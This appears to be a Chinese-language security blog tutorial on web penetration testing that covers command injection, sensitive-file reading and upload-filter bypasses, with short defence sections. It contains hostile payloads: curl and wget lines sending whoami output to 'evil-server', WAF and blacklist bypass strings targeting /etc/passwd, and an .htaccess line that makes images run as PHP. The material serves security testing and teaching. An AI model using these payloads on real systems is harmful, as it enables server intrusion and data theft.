婷婷久久综合九色综合,欧美成色婷婷在线观看视频,偷窥视频一区,欧美日本一道道一区二区

<tt id="bu9ss"></tt>
  • <span id="bu9ss"></span>
  • <pre id="bu9ss"><tt id="bu9ss"></tt></pre>
    <label id="bu9ss"></label>

    當前位置:首頁 >  站長 >  建站經(jīng)驗 >  正文

    網(wǎng)站命令執(zhí)行滲透測試步驟詳情

     2019-10-10 16:02  來源: A5用戶投稿   我來投稿 撤稿糾錯

      阿里云優(yōu)惠券 先領(lǐng)券再下單

    哈嘍大家好,近期我們Sine安全對客戶平臺進行滲透測試的時候,發(fā)現(xiàn)有一些命令執(zhí)行的漏洞測試語句和函數(shù),導致服務(wù)器被提權(quán)被入侵,上一節(jié)提到XSS跨站腳本攻擊檢測方法,本章來總和一下腳本執(zhí)行命令的詳細檢測手段,以及繞過waf的辦法,只有這樣詳細的對平臺進行安全測試才能保障整個平臺安全穩(wěn)定。

    3.5.1. 簡介

    命令注入通常因為指Web應(yīng)用在服務(wù)器上拼接系統(tǒng)命令而造成的漏洞。

    該類漏洞通常出現(xiàn)在調(diào)用外部程序完成一些功能的情景下。比如一些Web管理界面的配置主機名/IP/掩碼/網(wǎng)關(guān)、查看系統(tǒng)信息以及關(guān)閉重啟等功能,或者一些站點提供如ping、nslookup、提供發(fā)送郵件、轉(zhuǎn)換圖片等功能都可能出現(xiàn)該類漏洞。

    3.5.2. 常見危險函數(shù)

    3.5.2.1. PHP

    system

    exec

    passthru

    shell_exec

    popen

    proc_open

    3.5.2.2. Python

    system

    popen

    subprocess.call

    spawn

    3.5.2.3. Java

    java.lang.Runtime.getRuntime().exec(command)

    3.5.3. 常見注入方式

    分號分割

    || && & 分割

    | 管道符

    \r\n %d0%a0 換行

    反引號解析

    $() 替換

    3.5.4. 無回顯技巧

    bash反彈shell

    DNS帶外數(shù)據(jù)

    http帶外

    curl http://evil-server/$(whoami)

    wget http://evil-server/$(whoami)

    無帶外時利用 sleep 或其他邏輯構(gòu)造布爾條件

    3.5.5. 常見繞過方式

    3.5.5.1. 空格繞過

    < 符號 cat<123

    \t / %09

    ${IFS} 其中{}用來截斷,比如cat$IFS2會被認為IFS2是變量名。另外,在后面加個$可以起到截斷的作用,一般用$9,因為$9是當前系統(tǒng)shell進程的第九個參數(shù)的持有者,它始終為空字符串

    3.5.5.2. 黑名單繞過

    a=l;b=s;$a$b

    echo "bHM=" | -d

    /?in/?s => /bin/ls

    連接符 cat /etc/pass'w'd

    未定義的初始化變量 cat$x /etc/passwd

    3.5.5.3. 長度限制繞過

    >wget\

    >foo.\

    >com

    ls -t>a

    sh a

    上面的方法為通過命令行重定向?qū)懭朊睿又ㄟ^ls按時間排序把命令寫入文件,最后執(zhí)行 直接在Linux終端下執(zhí)行的話,創(chuàng)建文件需要在重定向符號之前添加命令 這里可以使用一些諸如w,[之類的短命令,(使用ls /usr/bin/?查看) 如果不添加命令,需要Ctrl+D才能結(jié)束,這樣就等于標準輸入流的重定向 而在php中 , 使用 shell_exec 等執(zhí)行系統(tǒng)命令的函數(shù)的時候 , 是不存在標準輸入流的,所以可以直接創(chuàng)建文件

    3.5.6. 常用符號

    3.5.6.1. 命令分隔符

    %0a / %0d / \n / \r

    ;

    & / &&

    3.5.6.2. 通配符

    * 0到無窮個任意字符

    ? 一個任意字符

    [ ] 一個在括號內(nèi)的字符,e.g. [abcd]

    [ - ] 在編碼順序內(nèi)的所有字符

    [^ ] 一個不在括號內(nèi)的字符

    3.5.7. 防御

    不使用時禁用相應(yīng)函數(shù)

    盡量不要執(zhí)行外部的應(yīng)用程序或命令

    做輸入的格式檢查

    轉(zhuǎn)義命令中的所有shell元字符

    shell元字符包括 #&;`,|*?~<>^()[]{}$\

    3.6. 文件讀取

    3.6. 文件讀取

    考慮讀取可能有敏感信息的文件

    用戶目錄下的敏感文件

    .bash_history

    .zsh_history

    .profile

    .bashrc

    .gitconfig

    .viminfo

    passwd

    應(yīng)用的配置文件

    /etc/apache2/apache2.conf

    /etc/nginx/nginx.conf

    應(yīng)用的日志文件

    /var/log/apache2/access.log

    /var/log/nginx/access.log

    站點目錄下的敏感文件

    .svn/entries

    .git/HEAD

    WEB-INF/web.xml

    .htaccess

    特殊的備份文件

    .swp

    .swo

    .bak

    index.php~

    Python的Cache

    __pycache__\__init__.cpython-35.pyc

    3.7. 文件上傳

    3.7.1. 文件類型檢測繞過

    3.7.1.1. 更改請求繞過

    有的站點僅僅在前端檢測了文件類型,這種類型的檢測可以直接修改網(wǎng)絡(luò)請求繞過。同樣的,有的站點在后端僅檢查了HTTP Header中的信息,比如 Content-Type 等,這種檢查同樣可以通過修改網(wǎng)絡(luò)請求繞過。

    3.7.1.2. Magic檢測繞過

    有的站點使用文件頭來檢測文件類型,這種檢查可以在Shell前加入對應(yīng)的字節(jié)以繞過檢查。幾種常見的文件類型的頭字節(jié)如下表所示

    3.7.1.3. 后綴繞過

    部分服務(wù)僅根據(jù)后綴、上傳時的信息或Magic Header來判斷文件類型,此時可以繞過。

    php由于歷史原因,部分解釋器可能支持符合正則 /ph(p[2-7]?|t(ml)?)/ 的后綴,如 php / php5 / pht / phtml / shtml / pwml / phtm 等 可在禁止上傳php文件時測試該類型。

    jsp引擎則可能會解析 jspx / jspf / jspa / jsw / jsv / jtml 等后綴,asp支持 asa / asax / cer / cdx / aspx / ascx / ashx / asmx / asp{80-90} 等后綴。

    除了這些繞過,其他的后綴同樣可能帶來問題,如 vbs / asis / sh / reg / cgi / exe / dll / com / bat / pl / cfc / cfm / ini 等。

    3.7.1.4. 系統(tǒng)命名繞過

    在Windows系統(tǒng)中,上傳 index.php. 會重命名為 . ,可以繞過后綴檢查。也可嘗試

    index.php%20, index.php:1.jpg index.php::$DATA 等。在Linux系統(tǒng)中,可以嘗試上傳名為 index.php/. 或 ./aa/../index.php/. 的文件

    3.7.1.5. .user.ini

    在php執(zhí)行的過程中,除了主 php.ini 之外,PHP 還會在每個目錄下掃描 INI 文件,從被執(zhí)行的 PHP 文件所在目錄開始一直上升到 web 根目錄($_SERVER[‘DOCUMENT_ROOT’] 所指定的)。如果被執(zhí)行的 PHP 文件在 web 根目錄之外,則只掃描該目錄。.user.ini 中可以定義除了PHP_INI_SYSTEM以外的模式的選項,故可以使用 .user.ini 加上非php后綴的文件構(gòu)造一個shell,比如 auto_prepend_file=01.gif 。

    3.7.1.6. WAF繞過

    有的waf在編寫過程中考慮到性能原因,只處理一部分數(shù)據(jù),這時可以通過加入大量垃圾數(shù)據(jù)來繞過其處理函數(shù)。

    另外,Waf和Web系統(tǒng)對 boundary 的處理不一致,可以使用錯誤的 boundary 來完成繞過。

    3.7.1.7. 競爭上傳繞過

    有的服務(wù)器采用了先保存,再刪除不合法文件的方式,在這種服務(wù)器中,可以反復上傳一個會生成Web Shell的文件并嘗試訪問,多次之后即可獲得Shell。

    3.7.2. 攻擊技巧

    3.7.2.1. Apache重寫GetShell

    Apache可根據(jù)是否允許重定向考慮上傳.htaccess

    內(nèi)容為

    AddType application/x-httpd-php .png php_flag engine 1

    就可以用png或者其他后綴的文件做php腳本了

    3.7.2.2. 軟鏈接任意讀文件

    上傳的壓縮包文件會被解壓的文件時,可以考慮上傳含符號鏈接的文件 若服務(wù)器沒有做好防護,可實現(xiàn)任意文件讀取的效果,如果覺得防護做的不到位 不放心的話,可以找專業(yè)的網(wǎng)站安全公司來處理解決,畢竟術(shù)業(yè)有專攻,國內(nèi)做的比較好的公司如:Sinesafe,綠盟,啟明星辰等等。

    3.7.3. 防護技巧

    使用白名單限制上傳文件的類型

    使用更嚴格的文件類型檢查方式

    限制Web Server對上傳文件夾的解析

    申請創(chuàng)業(yè)報道,分享創(chuàng)業(yè)好點子。點擊此處,共同探討創(chuàng)業(yè)新機遇!

    相關(guān)文章

    熱門排行

    信息推薦